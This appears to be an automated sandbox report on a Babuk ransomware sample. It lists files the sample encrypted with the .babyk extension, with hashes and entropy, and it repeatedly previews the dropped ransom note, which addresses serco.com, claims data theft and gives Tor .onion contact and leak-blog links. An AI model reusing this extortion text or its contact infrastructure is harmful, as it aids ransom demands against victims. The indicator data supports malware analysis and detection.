                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2019-06-27.1954.6516.1.aodl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):5952
                                                                            Entropy (8bit):7.972660854219623
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2019-06-27.1954.6516.1.odl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):5945
                                                                            Entropy (8bit):7.975653594765339
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2019-06-27.1954.6860.1.aodl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):6002
                                                                            Entropy (8bit):7.970068259090698
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2019-06-27.1954.6860.1.odl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):748
                                                                            Entropy (8bit):7.742392976217262
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            Preview: ../...`...>a.&;v.....s.]...Z..^.L".BAIb.....q2.@....H...\>V,.G...........N.>........9..*,...d@<.y.........m.Q...7....]]z.^*.HaN..`..4.x.J..YvPx.e7G.i...Y:.5.8.w7..R...P.9{..}....A7xU.....4..:m.).STk.g..........y.8.f.d.=.'(...0;....~A..s....m..U..?~V....-D.SH...!..B..a.n,Z..v....\...+.t.'^...D..........O,.h....6%.......;'...b.jFd,w..4?GF......]...D..H...X...J..+.....54.l....f...e...{8..y.^..-p.y............#........[2.......x...M....gO.....=.<PO.^|...G,..H..../.....-r._..S.gy....M.O.Q....9..b...p...G.+u........ZN.$../u.z.T.,.......*.|....J.1/..Oo.......?y....$.}.....~...B..p\.p3.k.3...P..[..+/....w%..d.......kZ.....K.....z..q.y.RG.......JS..~.L....A.U...}.l..l...-..7...W....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_125252_1864-1868.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):564378
                                                                            Entropy (8bit):7.999703262976329
                                                                            Encrypted:true
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_195437_6860-6784.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):159254
                                                                            Entropy (8bit):7.998729545202949
                                                                            Encrypted:true
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_125251_1844-1848.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93660
                                                                            Entropy (8bit):7.997858958611787
                                                                            Encrypted:true
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_195423_6516-6324.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):40266
                                                                            Entropy (8bit):7.995002525037019
                                                                            Encrypted:true
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\StandaloneUpdate_2020-07-23_174331_1308-e78.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2062
                                                                            Entropy (8bit):7.904178866493889
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-07-27_074908_1728-1718.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):94486
                                                                            Entropy (8bit):7.998066582074327
                                                                            Encrypted:true
                                                                            SSDEEP:1536:wuF9fZyl3zC+1CHg5/Po3WdmsgdY00IsAKXN71pU1tJq2nOviv+a89G4:wubRm3zC8vu3Wdms0Yv971piJRj+H9G4
                                                                            MD5:FD4431F797D0EF719D3D6E0C1C6A31F9
                                                                            SHA1:EF7C256504894D04930BD5B5F513D2557DA2C353
                                                                            SHA-256:7FB80513656E8379B50037E8ECC140BE798449C0BE1AE0E1A076096FBC8791FC
                                                                            SHA-512:F0CB922D4AD1388AE6E7846AE44307156E96AD1893D9045666A481B0F02AF48095F9AE5CA5D2E5046AD0F2CE858FFC5B6E576A4F585BA11AD8471526D1DB50B8
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-08-26_080227_17fc-17f8.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):91780
                                                                            Entropy (8bit):7.9980869787990185
                                                                            Encrypted:true
                                                                            SSDEEP:1536:P9KaiqdSBTP/n82VJK6/RQcLYPVNss6JYlNE6fTtVpprnAhPOwhQB5eWWWnFp:EBPEQK6/RDLYNNrlNE65VpJnePKeWFFp
                                                                            MD5:7B290DB1AD3FEA357E52AA52214833F7
                                                                            SHA1:C5182EFBD2F629E4C1350B8E3E837AEEEB5EE61D
                                                                            SHA-256:41188ADB390A66A10067C654882B49AF3A4A2A35E4681BA0D3D3D3D4F0E881AD
                                                                            SHA-512:402880FC0DA0DD7D1C89C46A646961B812A39FC81BBFED415004D1A23D944E43492CA0F5D9919594F92A40AFB97E3C6A61FF371BCBF1EBBB912047EECFB9ADE4
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-09-30_082319_c94-ff4.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):91776
                                                                            Entropy (8bit):7.997876035833207
                                                                            Encrypted:true
                                                                            SSDEEP:1536:4g8c0KZLZbyVN2hvTxvklaeROsIU71C+sEgGnKF+wvYkJOWjKlRO7E+5PVwxR9I:4g8oLcVqv9vkcbY7psEgGKF+s7jZ7E09
                                                                            MD5:B5D6E6A44426CAAEBAF2A86DD18D7418
                                                                            SHA1:58136D4E540D06F297CA6E2DBF724C9EB00FE1DD
                                                                            SHA-256:97F1E7F98C7232AB2B74167E88DCC06402EB901C8999923EF0389231CB9ECDA1
                                                                            SHA-512:64EF766E19FA962105DB9CB46977A091533F62F1F230FE4A085DB603365AF604225BC2DDBC3B76AFD2332BDC0F865C1448822885F8D1A2571E9F156E6766F971
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-07-27_074908_16c0-4d4.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):110592
                                                                            Entropy (8bit):7.998573741410008
                                                                            Encrypted:true
                                                                            SSDEEP:3072:YUwHAsL0tGOnCS6OGDhYeSbCOjeOblf1Pg5sNmE9hh:YXoPCSsDLSe0eObxx4s/j
                                                                            MD5:A756289881FC0A722045B47472332A06
                                                                            SHA1:71EF47823768BBCF023FFA77F00A9B49BEA8373D
                                                                            SHA-256:CFF992F184FD690BC7B2B2A7EB68377C526BDEC51836363B9E470BED7CA1B1B6
                                                                            SHA-512:39B8BB93A5BECA3A3BE507CFDDE684AA335C748C1E1D6A77C1FAC386E89EBF98C79D0BC37AF29E7E5608082455F7B4DD64263EA470067358527930A19A97A469
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-08-26_080227_145c-17a4.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93818
                                                                            Entropy (8bit):7.9980776551755985
                                                                            Encrypted:true
                                                                            SSDEEP:1536:IUgwD0dEzZ45Y6DjqKKY4JRwa2JkV/8ftJAt6fd2YSoJhbawXK2awLpbhkAKcVX8:a80GzumcqKKYSRlOkV0ftJHfd2YScK2W
                                                                            MD5:69ADA84D8FE3C35F9663A21829419F3B
                                                                            SHA1:2EAD49EBF8ED54C533CDCBFCA43C7E0456E01CFB
                                                                            SHA-256:A6C11832120D671250413CEAF5E6B0A542B7EAD609E937406A99A1CD5A1FC92F
                                                                            SHA-512:36FA38F6BEB76EC5E562B22BF04D5E77F2022592480654CE4354DBD094B794C0269C433368B42B0757B92A6B57EC598FC0A5017F9B2F9FEA6BBE1957507A07B8
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-09-30_082319_1314-414.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93814
                                                                            Entropy (8bit):7.99772050097407
                                                                            Encrypted:true
                                                                            SSDEEP:1536:1I61cQfx9kDqxSM7W71b0bcbztv4DeXIhY0yE81Fzn5nZwArditfNAZr:1INQpGD07c0bcntQOF1FznTx/Zr
                                                                            MD5:744F7F0EEA07BCBC66A33CA5275EA878
                                                                            SHA1:664B621DF473280B725A2D87FE2ADBEBE35D1581
                                                                            SHA-256:492CCA5F21EABDE8A0752971B12DD3A72BA97DDC3CDA8DE7171A49DF39D7D720
                                                                            SHA-512:2022295C469219CE2BB2793885176E827BB80E567C7F755F8AD651186FA661F9C876C7C5296D68B26F986E744A5A44BA46E4490A2FA68A4CDC7D6B9D9E2142E7
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-07-27_074907_15c-410.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93160
                                                                            Entropy (8bit):7.997973714489346
                                                                            Encrypted:true
                                                                            SSDEEP:1536:Mr0tOGlEQFVY0r7x6VYc6N1NyUrjLgT62fUfbG2z2YlmJsXsRWalYvk:t1lV3YmNYityUXLQ3sfbGLY2gaMk
                                                                            MD5:088BCC22DD35CF7439BB9581A0E51A76
                                                                            SHA1:233671BE4B1D12BAD00EA5B2FB52641441BE23FC
                                                                            SHA-256:A076168BFEAA927E079F86BDF772359E16EC66AEB15A1FBDFC5F8F3D8AF5A48A
                                                                            SHA-512:EF6158431AB1302B1E35642E9E0B18FD935212681E8EFDF89757BFF50F69F427CAD617D2C6AC63206E6274ED86B2F5636A673744FF8DF5D8F23EB60B7A64FCD4
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-08-26_080226_b58-b68.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93548
                                                                            Entropy (8bit):7.998136124711158
                                                                            Encrypted:true
                                                                            SSDEEP:1536:G7XOJDzpOr9L7CdG7U+TTSPxvW7Gq83Jz9bz6YH/mqfXNBt9e8+OrzgSx26IoOKr:8QzAZCdcSP+Gqebmm/mqflQ8+Mfx2COG
                                                                            MD5:BE283A2DD601C6D1EDF68E85AE4DB1EE
                                                                            SHA1:8AECA4F4FEA74C7C819F4746042812DFFF3BD0A6
                                                                            SHA-256:CE8BC15361AFF82BBF3539A3F7AFAFA5B22DDEB298773D1155929987949828AC
                                                                            SHA-512:1BB07F33F24D52D4C694E5A29CB360617D3EAEC452C75581B293D4B725A2A446515C37CC59793EC5F337474F9A19BF1E2221CAC226B564753D1FED9D3803BB5A
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-09-30_082318_17d4-1694.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93548
                                                                            Entropy (8bit):7.99808798619532
                                                                            Encrypted:true
                                                                            SSDEEP:1536:FBVmxvrL0OdW5VSngUcQq/UfBowzr1/jJAa3gdzwQqLPXnK+p4ghNRBcRt9:7V4vroTggUcV/iPV/jJ/szwQKnH64Nyn
                                                                            MD5:74CB59F205E212063B9344754BD547E5
                                                                            SHA1:7519F0D7FF21EBC715E57C0659BA425909D36111
                                                                            SHA-256:6D6367450488D86B8289DD153873B1045176C116FC1B7AC057ADB7A85620A585
                                                                            SHA-512:7CC7B717D712CC9CFDABBBD02EF79B22AD17922944F2AB53B6734631AB5BAC348051CCF604B69B30A44EAEF9A1C536A652C042FC445063AC22D43B4F50DDB83E
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_125339_1b84-1b30.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):15182
                                                                            Entropy (8bit):7.989215816220054
                                                                            Encrypted:false
                                                                            SSDEEP:384:4BAHbExtUtIzldGCbxrsKmBhDpVY0sCsbLwzR:4YIXUtIzmCbx8vDplnlR
                                                                            MD5:2BC974B07F3B086B00293258D5F1A20B
                                                                            SHA1:73D671162D3801F6A4B51A88FC7BB7AA1644D56E
                                                                            SHA-256:1BACE2DBB3EE6B5F98DD738979DD23DEE407C53A24CF99BA5D0909D548C2EAB8
                                                                            SHA-512:4CD234C321DC090570DA8582081FA88D56039F5E37AAA04EA4A2268B63C64ADE5DDA6AAE4F268B65287D98250B4B59BD238AF1DCEF27D6017AA8BC8185E46AA4
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_195441_60-6252.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):21002
                                                                            Entropy (8bit):7.990830822476722
                                                                            Encrypted:true
                                                                            SSDEEP:384:LS/EFLHF9b/u4yvaZbGNribxOvx5em0DhsqyXit4Kgstc+26SQDbsNMoh:kEFzF9b/Gvy0iIY3hNTg5+2SDqMoh
                                                                            MD5:8568A3A2CEB614FF7BF84D84566D9EE5
                                                                            SHA1:C80078E851B3160CB416C7F964EC9744AB87664C
                                                                            SHA-256:CC3131B489203A87905C72068AFD5AABA18F387D74CFB1B9BCE7681F09B3C4F3
                                                                            SHA-512:00D0389EF7ACA7286B75B53746DC28A3FC7E4C3CD4E4DE70EB36A695B2AAE2DCE320B5D1A35D879A1FC0B3A4202CFF06F429F6C719A7EE11846D6F6101B3808E
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\parentTelemetryCache.otc.session.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):20648
                                                                            Entropy (8bit):7.989929713887123
                                                                            Encrypted:false
                                                                            SSDEEP:384:FcBswkSqdBfSxtZY1Nqu89+5Dk3PV7+XBrheoZA1dxOA1:FciwkRfiS189l3N7KBteuA/xOA1
                                                                            MD5:0A158E27D7355B8237F6319B36F81176
                                                                            SHA1:100C000C633F979B94125158AD84A03168A5E2D9
                                                                            SHA-256:5536BE40F6B4DC3A46AD4D51118D1CBA807F18F34B71D491CA9AE0CC0B19E911
                                                                            SHA-512:DB345DA303DE8E9CE1A42A4B2B9FE8168FCB386EEE51FB6693978F4E9B88EB49A1AC44F1F18379B37170D6BB755B5D5DCC85ED791A4FA57F1CC458B6DF7BB7D7
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):20648
                                                                            Entropy (8bit):7.991160755475869
                                                                            Encrypted:true
                                                                            SSDEEP:384:x54jXCJK4KrfWeSZ3KapygAj1+vTQpVl8PeiGjQ/X8SIRr5gByQ:vTJbe4Kagnj1qQqPPf8SIRlWyQ
                                                                            MD5:0D780C734F66355D6D0D2F0799B2B258
                                                                            SHA1:6EE05CF41C34B6A906041E14B17107E0924D7A5E
                                                                            SHA-256:7AA1D9425AF75708A4384F181919970FCC5D8022A533E1A7B3521A3740C973A6
                                                                            SHA-512:D6B715013DE682823B4DDDA0FB26A9C958EC3EF41C98BC1408EDE8AAA5A67FB1A373C9B017D07D32967191510D77249B87B8629869F5C249B784038358027AC7
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1152
                                                                            Entropy (8bit):7.849028939215543
                                                                            Encrypted:false
                                                                            SSDEEP:24:u9kpRChzvi22RmeUzYYiosuCyAHs8kBBqsm0kuyunFSV:J2bfQ+MYGFbRkw0m
                                                                            MD5:B537BDBD8A8D2609AFE810FF4604CC44
                                                                            SHA1:95C4B5F3F9AEA695978214C88C47DB220E6DAE63
                                                                            SHA-256:DF41AB7134D5411A7C5D23BE421FC74775A7D200CC21F050A50EB863D1BAE98C
                                                                            SHA-512:DDCD1B8380BE701BB2AA5D92B3843C7783CC7801425B7481C181BE51532D970262A6643CC45F65691FCE848AA5DD1EDC4FDBF37CF055DAF9308A1CE80EABAFA6
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\PenWorkspace\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\PlayReady\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2852
                                                                            Entropy (8bit):7.936797819245317
                                                                            Encrypted:false
                                                                            SSDEEP:48:cC0xfNXJmH8VbVgC/9pRSGVpFNVZMxO28KsiUeptRQNK6dYgpwOmUBLDMA3S6ddf:WVXJNVgC/9pgGVpXVOfsitRQN/YgpNXp
                                                                            MD5:B3B44741439BE13CA08F6616B988487C
                                                                            SHA1:7EA7CE85C91EF25A3B6E61B1A4E6F7BADFE6411B
                                                                            SHA-256:2C25035AC477996ECEFEDEC5D10491D2DD0603635F11ADDD62A273F5C8CDB1B1
                                                                            SHA-512:60F92A360F67C6514BC042B598B448C5F069EAB7D5CA8D1145A1F1D1A953B8E8C3732D1F00A59C36D753BCFC73B352EC89642683F623DD7F9E5C64B6D0A858B0
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):604
                                                                            Entropy (8bit):7.612242740809532
                                                                            Encrypted:false
                                                                            SSDEEP:12:SQnCQDBLbtfp+ClJCun9Tz2paukX9qu3T:4QDB/tfpDFZOa313T
                                                                            MD5:09E4628E49FE6EA3309AABC0C31034B9
                                                                            SHA1:BD0B896CD38D97316FB57A32962C10F66E1E75FA
                                                                            SHA-256:696DF1A0971271257FBCCDB97B4F761D9F22CFDA75D1A81980E261CD0F2C9D5B
                                                                            SHA-512:D3D90F6D1444526B904ED5C365E76C8956ACA926AA631499FF367E6CF16FEC18F26DD6214A3E7F349B4420EAF9A2415091455FB1A127AD3C057865A20E08D6AE
                                                                            Malicious:false
                                                                            Preview: [encrypted binary content omitted] ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Vault\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):169
                                                                            Entropy (8bit):6.5256521996062355
                                                                            Encrypted:false
                                                                            SSDEEP:3:yldC/2MQooPrazgh5jH8+cU0xBdwBou+H1+rX7yEMcRMkF7tXQkQBUl/aLUxNvEE:y6/2MCDYgvZcU0uZ+UfMcqe7tXQkacas
                                                                            MD5:692199F4161D0616D1C2607082609B4B
                                                                            SHA1:C0C0B32863FB3B1E666F97464841162305FABBAA
                                                                            SHA-256:018100E753358B1304C864E8E51F5020886CE875609D23DC9995CB43D6BE0C34
                                                                            SHA-512:889B2D70C75DE6EF9F4A3BBF5580A5EC57AA4A57F3E110F6A2A715BE2B697EED044DB235B636BF259DA6036ADAA39D3D9422A945CB18E0654EF19B03D704AFF7
                                                                            Malicious:false
                                                                            Preview: ....~.g..i...=.w..s.R.L24..#.C..>...wU.G[;.\.......J.9Yrf..#.;.d.3..v...F....'8N.7P[..8..QI.%...4ilW.Ph.......^y+..j5...5..f....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
